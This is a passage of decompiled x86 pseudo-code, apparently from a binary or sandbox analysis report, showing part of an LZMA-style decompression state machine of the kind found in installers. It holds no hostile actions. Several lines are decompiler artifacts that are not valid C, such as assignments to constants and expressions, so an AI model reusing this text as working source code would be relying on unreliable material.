                                                                                                                      							__ebx =  *(__ebp - 0x50);
                                                                                                                      							0 = 1;
                                                                                                                      							__eax = 1 << __cl;
                                                                                                                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                      							__eax =  *(__ebp - 0x7c);
                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                      							while(1) {
                                                                                                                      								L140:
                                                                                                                      								 *(_t612 - 0x88) = _t533;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t534 =  *(_t612 - 0x88);
                                                                                                                      									if(_t534 > 0x1c) {
                                                                                                                      										break;
                                                                                                                      									}
                                                                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
                                                                                                                      										case 0:
                                                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                      											_t534 =  *( *(_t612 - 0x70));
                                                                                                                      											if(_t534 > 0xe1) {
                                                                                                                      												goto L171;
                                                                                                                      											}
                                                                                                                      											_t538 = _t534 & 0x000000ff;
                                                                                                                      											_push(0x2d);
                                                                                                                      											asm("cdq");
                                                                                                                      											_pop(_t569);
                                                                                                                      											_push(9);
                                                                                                                      											_pop(_t570);
                                                                                                                      											_t608 = _t538 / _t569;
                                                                                                                      											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                      											asm("cdq");
                                                                                                                      											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                      											 *(_t612 - 0x3c) = _t603;
                                                                                                                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                      												L10:
                                                                                                                      												if(_t611 == 0) {
                                                                                                                      													L12:
                                                                                                                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                      													goto L15;
                                                                                                                      												} else {
                                                                                                                      													goto L11;
                                                                                                                      												}
                                                                                                                      												do {
                                                                                                                      													L11:
                                                                                                                      													_t611 = _t611 - 1;
                                                                                                                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                      												} while (_t611 != 0);
                                                                                                                      												goto L12;
                                                                                                                      											}
                                                                                                                      											if( *(_t612 - 4) != 0) {
                                                                                                                      												GlobalFree( *(_t612 - 4));
                                                                                                                      											}
                                                                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                      											 *(_t612 - 4) = _t534;
                                                                                                                      											if(_t534 == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											} else {
                                                                                                                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                      												goto L10;
                                                                                                                      											}
                                                                                                                      										case 1:
                                                                                                                      											L13:
                                                                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                                                      												 *(_t612 - 0x88) = 1;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                      											_t45 = _t612 - 0x48;
                                                                                                                      											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                      											__eflags =  *_t45;
                                                                                                                      											L15:
                                                                                                                      											if( *(_t612 - 0x48) < 4) {
                                                                                                                      												goto L13;
                                                                                                                      											}
                                                                                                                      											_t546 =  *(_t612 - 0x40);
                                                                                                                      											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                                                      												L20:
                                                                                                                      												 *(_t612 - 0x48) = 5;
                                                                                                                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                      												goto L23;
                                                                                                                      											}
                                                                                                                      											 *(_t612 - 0x74) = _t546;
                                                                                                                      											if( *(_t612 - 8) != 0) {
                                                                                                                      												GlobalFree( *(_t612 - 8));
                                                                                                                      											}
                                                                                                                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                      											 *(_t612 - 8) = _t534;
                                                                                                                      											if(_t534 == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											} else {
                                                                                                                      												goto L20;
                                                                                                                      											}
                                                                                                                      										case 2:
                                                                                                                      											L24:
                                                                                                                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                      											 *(_t612 - 0x84) = 6;
                                                                                                                      											 *(_t612 - 0x4c) = _t553;
                                                                                                                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                      											goto L132;
                                                                                                                      										case 3:
                                                                                                                      											L21:
                                                                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                                                      												 *(_t612 - 0x88) = 3;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                      											_t67 = _t612 - 0x70;
                                                                                                                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                      											__eflags =  *_t67;
                                                                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                      											L23:
                                                                                                                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                      											if( *(_t612 - 0x48) != 0) {
                                                                                                                      												goto L21;
                                                                                                                      											}
                                                                                                                      											goto L24;
                                                                                                                      										case 4:
                                                                                                                      											L133:
                                                                                                                      											_t531 =  *_t605;
                                                                                                                      											_t588 = _t531 & 0x0000ffff;
                                                                                                                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                      											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                      												 *(_t612 - 0x40) = 1;
                                                                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                                                                      												__eflags = _t532;
                                                                                                                      												 *_t605 = _t532;
                                                                                                                      											} else {
                                                                                                                      												 *(_t612 - 0x10) = _t564;
                                                                                                                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                      											}
                                                                                                                      											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                      												goto L139;
                                                                                                                      											} else {
                                                                                                                      												goto L137;
                                                                                                                      											}
                                                                                                                      										case 5:
                                                                                                                      											L137:
                                                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                                                      												 *(_t612 - 0x88) = 5;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                      											L139:
                                                                                                                      											_t533 =  *(_t612 - 0x84);
                                                                                                                      											goto L140;
                                                                                                                      										case 6:
                                                                                                                      											__edx = 0;
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                      												goto L132;
                                                                                                                      											}
                                                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                                                      											__cl = 8;
                                                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                      											__ecx =  *(__ebp - 4);
                                                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                      													_t98 = __ebp - 0x38;
                                                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                      													__eflags =  *_t98;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                                                      												__ebx = 0;
                                                                                                                      												__ebx = 1;
                                                                                                                      												goto L61;
                                                                                                                      											} else {
                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      													__eflags = __eax;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 8);
                                                                                                                      												__ebx = 0;
                                                                                                                      												__ebx = 1;
                                                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      												goto L41;
                                                                                                                      											}
                                                                                                                      										case 7:
                                                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      												__eax = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                      												goto L69;
                                                                                                                      											}
                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                      											goto L132;
                                                                                                                      										case 8:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                      											} else {
                                                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                      												 *(__ebp - 0x84) = 9;
                                                                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                      											}
                                                                                                                      											goto L132;
                                                                                                                      										case 9:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												goto L90;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											}
                                                                                                                      											__eax = 0;
                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                      											__eflags = _t259;
                                                                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                      											goto L76;
                                                                                                                      										case 0xa:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                      												goto L132;
                                                                                                                      											}
                                                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                                                      											goto L89;
                                                                                                                      										case 0xb:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      											} else {
                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      											L89:
                                                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      											L90:
                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                      											goto L69;
                                                                                                                      										case 0xc:
                                                                                                                      											L100:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t335 = __ebp - 0x70;
                                                                                                                      											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t335;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                                                      											goto L102;
                                                                                                                      										case 0xd:
                                                                                                                      											L37:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t122 = __ebp - 0x70;
                                                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t122;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											L39:
                                                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                      												goto L48;
                                                                                                                      											}
                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                      												goto L54;
                                                                                                                      											}
                                                                                                                      											L41:
                                                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                                                      											__eax = __eax + 1;
                                                                                                                      											__eax = __eax << 8;
                                                                                                                      											__eax = __eax + __ebx;
                                                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      											__ax =  *__esi;
                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												__cx = __ax;
                                                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                                                      												__cx = __ax >> 5;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                                                      												 *__esi = __ax;
                                                                                                                      											} else {
                                                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                      												0x800 = 0x800 - __edx;
                                                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                      												 *__esi = __cx;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      												goto L39;
                                                                                                                      											} else {
                                                                                                                      												goto L37;
                                                                                                                      											}
                                                                                                                      										case 0xe:
                                                                                                                      											L46:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t156 = __ebp - 0x70;
                                                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t156;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											while(1) {
                                                                                                                      												L48:
                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                      													break;
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                      												__esi = __edx + __eax;
                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      												__ax =  *__esi;
                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													__cx = __ax;
                                                                                                                      													__ebx = __edx + 1;
                                                                                                                      													__cx = __ax >> 5;
                                                                                                                      													__eflags = __eax;
                                                                                                                      													 *__esi = __ax;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                      													 *__esi = __cx;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      													goto L46;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      											L54:
                                                                                                                      											_t173 = __ebp - 0x34;
                                                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                      											__eflags =  *_t173;
                                                                                                                      											goto L55;
                                                                                                                      										case 0xf:
                                                                                                                      											L58:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t203 = __ebp - 0x70;
                                                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t203;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											L60:
                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                      												L55:
                                                                                                                      												__al =  *(__ebp - 0x44);
                                                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                      												goto L56;
                                                                                                                      											}
                                                                                                                      											L61:
                                                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                                                      											__edx = __ebx + __ebx;
                                                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                                                      											__esi = __edx + __eax;
                                                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      											__ax =  *__esi;
                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												__cx = __ax;
                                                                                                                      												__ebx = __edx + 1;
                                                                                                                      												__cx = __ax >> 5;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												 *__esi = __ax;
                                                                                                                      											} else {
                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                      												0x800 = 0x800 - __edi;
                                                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                      												 *__esi = __cx;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      												goto L60;
                                                                                                                      											} else {
                                                                                                                      												goto L58;
                                                                                                                      											}
                                                                                                                      										case 0x10:
                                                                                                                      											L110:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t366 = __ebp - 0x70;
                                                                                                                      											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t366;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											goto L112;
                                                                                                                      										case 0x11:
                                                                                                                      											L69:
                                                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                                                      											L132:
                                                                                                                      											 *(_t612 - 0x54) = _t605;
                                                                                                                      											goto L133;
                                                                                                                      										case 0x12:
                                                                                                                      											goto L0;
                                                                                                                      										case 0x13:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
